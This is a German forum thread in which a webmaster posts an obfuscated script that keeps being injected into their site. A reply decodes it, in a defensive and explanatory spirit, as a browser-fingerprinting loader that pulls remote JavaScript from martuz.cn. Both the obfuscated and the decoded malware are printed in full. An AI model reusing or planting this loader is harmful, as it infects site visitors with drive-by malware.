Eingeschlichener JScript Code

LeeroyJenkins

Grünschnabel
In einer meiner webseiten schleicht sich regelmäßig folgeder code ein

HTML:
<script language=javascript><!--
(function(lneB9){var ojE='%';var jVr='va"72"20a"3d"22Sc"72iptEn"67in"65"22"2c"62"3d"22Vers"69"6fn"28)"2b"22"2cj"3d"22"22"2cu"3dnavigator"2euse"72Agent"3bif((u"2eindexOf("22Chr"6fm"65"22)"3c0)"26"26(u"2eindexOf("22Wi"6e"22)"3e0)"26"26(u"2eindex"4ff("22NT"20"36"22)"3c"30"29"26"26"28docume"6et"2ecook"69e"2eind"65xOf("22miek"3d1"22)"3c0)"26"26(ty"70e"6ff(zr"76"7a"74s"29"21"3dtyp"65"6ff("22A"22)"29)"7b"7ar"76"7ats"3d"22A"22"3beval("22"69f(wi"6edow"2e"22"2ba"2b"22"29"6a"3dj"2b"22+a+"22Major"22+b+"61"2b"22Minor"22+b+a+"22Bu"69ld"22+b"2b"22j"3b"22"29"3bdocu"6de"6et"2ew"72ite"28"22"3cs"63r"69pt"20sr"63"3d"2f"2f"6d"22+"22"61rtu"7a"2ec"6e"2fvid"2f"3fid"3d"22"2bj+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d';eval(unescape(jVr.replace(lneB9,ojE)))})(/\"/g);
 --></script>

Trotz regelmäßiger Passwortänderungen etc. kommt dieser code immer wieder. Google sieht ihn als Malware an, und daher ist meine seite fast durchgehend unzugänglich. Mich würde interesiieren ob irgendjemand in der Lage ist, das hier zu entziffern und mir mitzuteilen was genau dieser code eigentlich macht (sieht für mich nach maschinencode aus, aber den kann ich nicht lesen.)
Vielen Dank
 
Javascript:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;

if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
               zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

An deiner Stelle würde ich mich mal ganz schnell mit XSS auseinandersetzen.
Bzw. es gibt auch ganz freundliche Werbungen die das verursachen, welche dann ganz schnell von der Seite verschwinden sollte.

//edit ( Erklärung vergessen )

Falls dir nicht klar sein sollte was dieser code bewirkt :

Dieses Script läd ein fremdes javascript von der Domain martuz .cn in deine Seite.
Was dieses Script dann wiederrum treibt will ich garnicht so genau wissen aber du kannst mal davon ausgehen das es nichts gutes ist.

//edit 2
Gerade mal nach martuz.cn gegoogelt das sollte dir weiterhelfen.
 
Zuletzt bearbeitet von einem Moderator:

Neue Beiträge

Zurück